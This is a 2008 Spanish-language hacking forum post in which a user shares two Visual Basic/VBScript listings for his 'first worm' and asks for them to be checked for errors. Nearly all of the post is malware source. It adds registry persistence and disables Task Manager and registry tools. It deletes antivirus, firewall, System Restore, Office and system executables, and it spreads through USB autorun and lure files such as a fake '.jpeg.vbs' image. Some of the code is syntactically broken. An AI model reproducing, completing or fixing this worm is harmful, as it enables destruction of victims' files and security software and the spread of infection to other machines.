elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Comprobación de integridad de un código de VB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Comprobación de integridad de un código de VB  (Leído 2,733 veces)
corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Comprobación de integridad de un código de VB
« en: 2 Enero 2008, 20:32 »

Buenos días a todos. Leyendo mini-manuales de VB en esta página web y en otras semejantes se me ocurrió probar a intentar crear mi primer gusano (por supuesto, basándome en código prefabricado de los manuales, sobre todo de uno de Hendrix, y usando parte del código del "michelle", de octalh. Bueno... es mi primer gusano, a sí que supongo que algo mal tendrá. Échenle un ojo y si ven algún error háganmelo saber ¿ok? :

Código
  1. App.Taskvisible = False
  2.  
  3. FileCopy App.Path & "\" & App.VBSname & ".vbs C:\Windows\System\services.vbs"
  4. Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services.vbs d/ C:\WINDOWS\System\services.vbs" 'el pequeñín ya está en el registro
  5. Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
  6. Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
  7. ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
  8. Kill "C:\WINDOWS\System32\shutdown.exe"
  9. Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"
  10.  
  11. Private Sub Form_Load()
  12. Form1.Visible = False
  13. MsgBox ("Runtime Error 492. El archivo está dañado o corrupto. Por favor, consiga otra copia."), vbCritical, "Fallo en la aplicación ""
  14. End Sub
  15.  
  16.  
  17. Open "C:\Windows\System32\winlog.bat" For Output As #1
  18. Print #1, "@echo off"
  19. Print #1, "If exist E:\ (Copy /y C:\WINDOWS\System\services.vbs E:\services.vbs)"
  20. Print #1, "If exist F:\ (Copy /y C:\WINDOWS\System\services.vbs F:\services.vbs)"
  21. Print #1, "If exist G:\ (Copy /y C:\WINDOWS\System\services.vbs G:\services.vbs)"
  22. Print #1, "exit"
  23. Close #1
  24. Shell ("C:\Windows\System32\Winlog.bat"), vbHide
  25.  
  26.  
  27. Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
  28. Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
  29. Kill "C:\Archivos de programa\ESET\nod32.exe"
  30. Kill "C:\Archivos de programa\ESET\nod32kui.exe"
  31. Kill "C:\Archivos de programa\ESET\nod32krn.exe"
  32. Kill "C:\Archivos de programa\ESET\nod32krr.dll"
  33. Kill "C:\Archivos de programa\ESET\nod32ari.dll"
  34. Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
  35. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
  36. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
  37. Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
  38. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
  39. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  40. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
  41. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
  42. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
  43. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
  44. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
  45. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
  46. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
  47. Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
  48. Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
  49. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
  50. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
  51. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe"
  52. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  53. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe"
  54. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe"
  55. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE"
  56. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe"
  57. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe"
  58. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe"
  59. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  60. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe"
  61. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE"
  62. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE"
  63. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe"
  64. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe"
  65. Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe"
  66. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  67. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe"
  68. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE"
  69. Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
  70. Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe"
  71. Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe"
  72. Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll"
  73. Kill "C:\Archivos de programa\AntiVir\avcenter.exe"
  74. Kill "C:\Archivos de programa\AntiVir\avscan.exe"
  75. Kill "C:\Archivos de programa\AntiVir\avnotify.exe"
  76. Kill "C:\Archivos de programa\AntiVir\guardgui.exe"
  77. Kill "C:\Archivos de programa\AntiVir\avgnt.exe"
  78. Kill "C:\Archivos de programa\AntiVir\avguard.exe"
  79. Kill "C:\Archivos de programa\AntiVir\avcmd.exe"
  80. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
  81. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe"
  82. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe"
  83. Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe"
  84. Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe"
  85. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe"
  86. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe"
  87. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe"
  88. Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe"
  89. Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll"
  90. Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe"
  91. Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe"
  92. Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
  93. Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe"
  94. Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe"
  95. Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe"
  96. Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe"
  97. Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe"
  98. Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
  99. Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
  100. Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
  101. Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
  102. Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
  103. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
  104. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
  105. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
  106. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
  107. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
  108. Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
  109. Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
  110. Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
  111. Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
  112. Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
  113. Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
  114. Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
  115. Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
  116. Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
  117. Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
  118. Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
  119. Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
  120. Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
  121. Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
  122. Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
  123. Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
  124. Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
  125. Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
  126. Kill "C:\Archivos de programa\ATS2\ats.exe"
  127. Kill "C:\Archivos de programa\ATS2\d1.exe"
  128. Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
  129. Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
  130. Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
  131. Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"
  132.  
  133.  
  134. 'otra opción de copiado es la siguiente:
  135. 'FileCopy App.Path & App.VBSName & ".vbs", "E:\services.vbs"
  136.  
  137. 'Ahora vamos a marcar nuestro dominio
  138.  
  139. Set Worm = CreateObject("WScript.Shell")
  140. Worm.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.elhacker.net"
  141.  
  142. Set firma = CreateObject("Wscript.Shell")
  143. firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"
  144.  
  145. Set firma = CreateObject("Wscript.Shell")
  146. firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"
  147.  
  148. 'comprimiendo el wormet
  149. Shell Winzip & "-a C:\porno.zip" & "C:\Windows\System\services.vbs" 'comprimir el virus
  150.  
  151. 'para extraer:
  152. 'Shell Winzip & "-e C:\porno.zip" &"C:\"
  153.  
  154. 'infectando RARs:
  155. Shell winrar & "a C:\confidencial.zip C:\WINDOWS\System\services.vbs"
  156. Shell winrar & "a C:\passwords.rar C:\WINDOWS\System\services.vbs"
  157.  
  158. Sub Main() 'motor de búsqueda en infección:
  159. On Error Resume Next
  160. If HayExcel Or HayWord Then
  161. Fso.CopyFile MiNombreVBS, "F:\Abril Lavigne Desnuda.jpeg.vbs"
  162. Fso.CopyFile DirWin & "Web\Folder.htt", "F:\Folder.htt", True
  163. Fso.CopyFile DirWin & "Web\Desktop.ini", "F:\Desktop.ini", True
  164. SetAttr "F:\Abril Lavigne Desnuda.jpeg", vbReadOnly
  165. SetAttr "F:\Desktop.ini", vbHidden
  166. SetAttr "F:\Folder.htt", vbHidden
  167. End If
  168. End Sub
  169.  
  170. 'infectando archivos de excel:
  171.  
  172. Function HayExcel() As Boolean
  173. Dim ExcelObj As Object
  174. On Error GoTo NoExcel
  175. Set ExcelObj = GetObject(, "Excel.Application")
  176. If ExcelObj.ActiveWorkbook.Path = "F:\" Then
  177. HayExcel = True
  178. Exit Function
  179. End If
  180. NoExcel:
  181. HayExcel = False
  182. End Function
  183.  
  184. Sub Main() 'Ahora un pequeño PayLoad
  185. If (Month(Now) = 6 or Month(Now) > 6) And (Day(Now) = 13 or Day(Now) < 13) Then
  186. MsgBox "Ándate con ojo porque dije que vendría y he venido", vbCritical, "Marca del Corruptor"
  187. MsgBox "Estás en mis manos... ¿quieres verlo?", vbExclamation, "Marca del Corruptor"
  188. MsgBox "DAME EL PaWeRrR!!!", vbExclamation, "Marca del Corruptor"
  189. MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
  190. End Sub
  191.  
  192. Sub Main()
  193. Randomize
  194. Num = Rnd
  195. If Num = 0 Then
  196. MsgBox "Has tenido suerte, mi amo ha querido que te respete. Dale gracias", vbExclamation, "El Perro Fiero de San Pancracio"
  197. End If
  198. If Num = 1 Then
  199. MsgBox "Algo has hecho para merecer la ira de mi amo. Hoy la suerte te ha abandonado.", vbExclamation, "El Perro Fiero"
  200. Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE"
  201. Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
  202. Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
  203. Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
  204. Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
  205. Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
  206. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
  207. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
  208. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
  209. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
  210. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
  211. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
  212. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
  213. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
  214. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
  215. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
  216. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
  217. Kill "C:\WINDOWS\System32\taskmgr.exe" 'esto borra el administrador de tareas
  218. Kill "C:\WINDOWS\Taskman.EXE" 'por si acaso, que no me fío
  219. Kill "C:\WINDOWS\System32\cmd.exe" 'esto elimina la opción de usar el MS-Dos
  220. Kill "C:\WINDOWS\regedit.exe" 'esto borra el editor del registro
  221. Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
  222. Kill "C:\WINDOWS\System32\command.com" 'esto borra la otra opción de usar el MS-Dos
  223. End If
  224. End Sub
  225.  
  226. Function Antidelete()
  227. Set fso = CreateObject("scripting.filesystemobject")
  228. Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
  229. MyCode = Myself.readall
  230. Myself.Close
  231. Do
  232. If Not (fso.fileexists(wscript.scriptfullname)) Then
  233. Set Myself = fso.createtextfile(wscript.scriptfullname, True)
  234. Myself.write MyCode
  235. Myself.Close
  236. End If
  237. Loop
  238. End Function

Bueno, de hecho son dos códigos:

Código
  1. '@echo off by Eliphas & Nehekara. Añoranza del Valhalla.
  2. 'por la gloria del Larisel IV, ahora y siempre
  3. 'Especiales agradecimientos a Octalh y a Hendrix
  4.  
  5.  
  6. App.Taskvisible = False
  7. MsgBox "Por fin nos hemos encontrado tú y yo.", vbExclamation, "Cherubael dice:"
  8. MsgBox "Sabrías que vendría y he venido.", vbExclamation, "Cherubael dice:"
  9. MsgBox "Nehekara no perdona los agravios recibidos.", vbExclamation, "Cherubael dice:"
  10. MsgBox "A sí que ahora afronta las consecuencias.", vbExclamation, "Cherubael dice:"
  11. MsgBox "Quod Erat Demostrandum...", vbExclamation, "Cherubael dice:"
  12. MsgBox "Todas las almas claman por su salvación.", vbExclamation, "Cherubael dice:"
  13. MsgBox "DAME EL PaWeRrR!!!", vbCritical, "Cherubael dice:"
  14.  
  15. Sub Main()
  16. On Error Resume Next
  17. If Month(Now) = 12 And Day(Now) = 17 Then
  18. MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema"
  19. End Sub
  20.  
  21. Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
  22. Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
  23. Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlogon.exe d/ C:\WINDOWS\System\winlogon.exe" 'el pequeñín ya está en el registro
  24. Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
  25. Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
  26. ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
  27. Kill "C:\WINDOWS\System32\shutdown.exe"
  28. Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"
  29.  
  30.  
  31. Sub Main() 'Dejando nuestra marca
  32. On Error Resume Next
  33. Set Cherubael = CreateObject("WScript.Shell")
  34. Cherubael.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.CherubaeL.com.ar"
  35.  
  36. Set firma = CreateObject("Wscript.Shell")
  37. firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta"
  38.  
  39. Set firma = CreateObject("Wscript.Shell")
  40. firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica"
  41. End Sub
  42.  
  43. Sub Main()
  44. On Error Resume Next
  45. Randomize
  46. Num = Rnd
  47. If Num = 0 Then
  48. MsgBox "A pesar de todo, voy a apiadarme de tí. SOnríe, eres libre.", vbExclamation, "Cherubael dice:"
  49. End If
  50. If Num = 1 Then
  51. MsgBox "Lo siento, pero debo cumplir mis órdenes. Hoy la suerte te ha abandonado.", vbExclamation, "Cherubael dice:"
  52. Kill "C:\WINDOWS\System32\taskmgr.exe"
  53. Kill "C:\WINDOWS\Taskman.EXE"
  54. Kill "C:\WINDOWS\System32\cmd.exe"
  55. Kill "C:\WINDOWS\regedit.exe"
  56. Kill "C:\WINDOWS\System32\wscui.cpl"
  57. Kill "C:\WINDOWS\System32\command.com"
  58. Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE" 'hala!! a tomar por culo el office...
  59. Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE"
  60. Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE"
  61. Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE"
  62. Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA"
  63. Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE"
  64. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE"
  65. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE"
  66. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE"
  67. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE"
  68. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA"
  69. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA"
  70. Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE"
  71. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll"
  72. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe"
  73. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe"
  74. Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab"
  75. End If
  76. End Sub
  77.  
  78.  
  79. '[  MODELO DE OBJETOS ]
  80.  
  81. Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS
  82. Set WshShell = wscript.CreateObject("WScript.Shell") ' REGISTRO
  83.  
  84.  
  85.  
  86.  
  87. '[  CONSTANTES  ]
  88.  
  89. GUSANETname = wscript.ScriptName ' Indicamos que el nombre del GUSANET sera
  90.                              ' el que tenga en ese momento el archivo actual.
  91. GUSANET = "GUSANET.vbs"
  92. 'Nombre del exe que tendra el GUSANET en el sistema
  93.  
  94. GUSANETpatch = fso.GetSpecialFolder(1) & "\" & GUSANET
  95. 'Indicamos el directorio donde se copiara el GUSANET, si utilizamos
  96. 'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1)
  97. 'sin importar donde se encuentre.
  98.  
  99. autorun = fso.GetSpecialFolder(1) & "\autorun.txt"
  100. 'lo mismo que en GUSANETpatch pero para el autorrun.
  101.  
  102. GUSANETusb = ":\proyecto.exe" ' Nombre que tendra el GUSANET en el medio extraible
  103.  
  104. autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible
  105.  
  106. Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante
  107.  
  108.  
  109. '[  CHEQUEO DE INFECCION  ]
  110.  
  111. If Not infeccion(GUSANET) Then
  112. copiar GUSANETname, GUSANETpatch
  113. End If
  114.  
  115.  
  116. ' +  INFECTAR REGISTRO DE WINDOWS  +
  117.  
  118.  
  119. If Not keyexist("GUSANET", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\") Then
  120. crearentradareg()
  121.  
  122. 'Si no existe la llave en el registro llamada GUSANET entonces la crea, con esto aseguramos
  123. 'el arranque del GUSANET con cada inicio del sistema.
  124.  
  125.  
  126.  
  127. 'Subproceso que se encarga crear un archivo y escribir datos en el
  128. 'en este caso le indicamos que cree un archivo con la constante autorun
  129. 'que definimos desde el principio
  130.  
  131. Sub makeautorun()
  132.    On Error Resume Next
  133. Set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de
  134.    mkaut.WriteLine "[AUTORUN]"                'la constante autorun
  135.    mkaut.WriteLine "open=" & GUSANETusb 'constante del nombre del ejecutable.
  136.    mkaut.WriteLine "shell\1=abrir"
  137.    mkaut.WriteLine "shell\1\Command=" & GUSANETusb
  138.    mkaut.WriteLine "shell\2\=explorar"
  139.    mkaut.WriteLine "shell\2\Command=" & GUSANETusb
  140.    mkaut.WriteLine "shellexecute=" & GUSANETusb
  141.    mkaut.Close
  142. End Sub
  143. 'aqui creamos el autorun que sirve para ejecutar el GUSANET cuando el pardillo haga doble click
  144. 'en el icono de la unidad extraible
  145.  
  146.  
  147. 'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura
  148. 'a cada archivo que compone al GUSANET
  149.  
  150. Sub makeatributos()
  151.    On Error Resume Next
  152. Dim archivosGUSANET(1) 'array archivosGUSANET que dentro de el contiene al GUSANET y su autorun
  153.    archivosGUSANET(0) = GUSANETpatch
  154.    archivosGUSANET(1) = autorun
  155.  
  156.       For Each file In archivosGUSANET ' por cada archivo dentro del array archivosGUSANET
  157.         Set wormcontent = fso.GetFile(file) 'tomalos y
  158.            wormcontent.Attributes = 7        'agregales atributos
  159.              Next
  160. End Sub
  161.  
  162.  
  163. 'Funcion que se encarga de verificar que exista una llave en el registro
  164.  
  165. Function keyexist(keyname, keyPath, regCategory)
  166.    On Error Resume Next
  167.     retVal = False
  168.     strComputer = "." 'inicamos en cualquier computadora
  169.     Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv") 'se crea un objeto
  170.  
  171.     oReg.EnumKey regCategory, keyPath, arrSubKeys 'partes de la clave del registro
  172.  
  173.     For Each subkey In arrSubKeys
  174.          If keyname = subkey Then
  175.               retVal = True
  176.               Exit For
  177.          End If
  178.     Next
  179.     keyExists = retVal
  180. End Function
  181. 'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos
  182. 'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista
  183. 'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra
  184. 'llave a verficar
  185.  
  186.  
  187. 'Subproceso que se encarga de crear la llave en el registro
  188. Private Sub crearentradareg()
  189.    On Error Resume Next
  190. WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GUSANET", _
  191. GUSANETpatch, "REG_SZ"
  192. End Sub
  193.  
  194.  
  195. 'Subproceso que se encarga de copiar al GUSANET a una unidad extraible.
  196. Private Sub infekusb()
  197.    On Error Resume Next
  198. Const DriveTypeRemovable = 1 ' indicamos medio extraible
  199. Do ' inicia loop infinito
  200. Set oFS = wscript.CreateObject("Scripting.FileSystemObject")
  201. Set oDrives = oFS.Drives 'declaramos todos los drivers
  202. For Each Drive In oDrives 'por cada driver
  203.    If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces
  204.        If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces
  205.            If fso.fileexists(Drive.DriveLetter + autorunusb) Then ' si existe autorun
  206.               Set cFile = fso.GetFile(Drive.DriveLetter + autorunusb) 'tomalo y
  207.               cFile.Attributes = 0 ' quitale los atributos
  208.               fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True 'despues copialo
  209.           Else ' de lo contrario
  210.      fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True ' copialo
  211.   End If
  212. fso.CopyFile GUSANETpatch, Drive.DriveLetter & GUSANETusb, True ' copia el GUSANET a la unidad
  213. End If
  214. End If
  215. Next
  216. Loop
  217. End Sub
  218.  
  219.  
  220. Sub Main()
  221. On Error Resume Next
  222. Kill "C:\Archivos de programa\ESET\nod32.exe"
  223. Kill "C:\Archivos de programa\ESET\nod32kui.exe"
  224. Kill "C:\Archivos de programa\ESET\nod32krn.exe"
  225. Kill "C:\Archivos de programa\ESET\nod32krr.dll"
  226. Kill "C:\Archivos de programa\ESET\nod32ari.dll"
  227. Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
  228. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
  229. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
  230. Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
  231. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
  232. Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
  233. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
  234. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
  235. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
  236. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
  237. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
  238. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
  239. Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
  240. Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
  241. Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
  242. Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
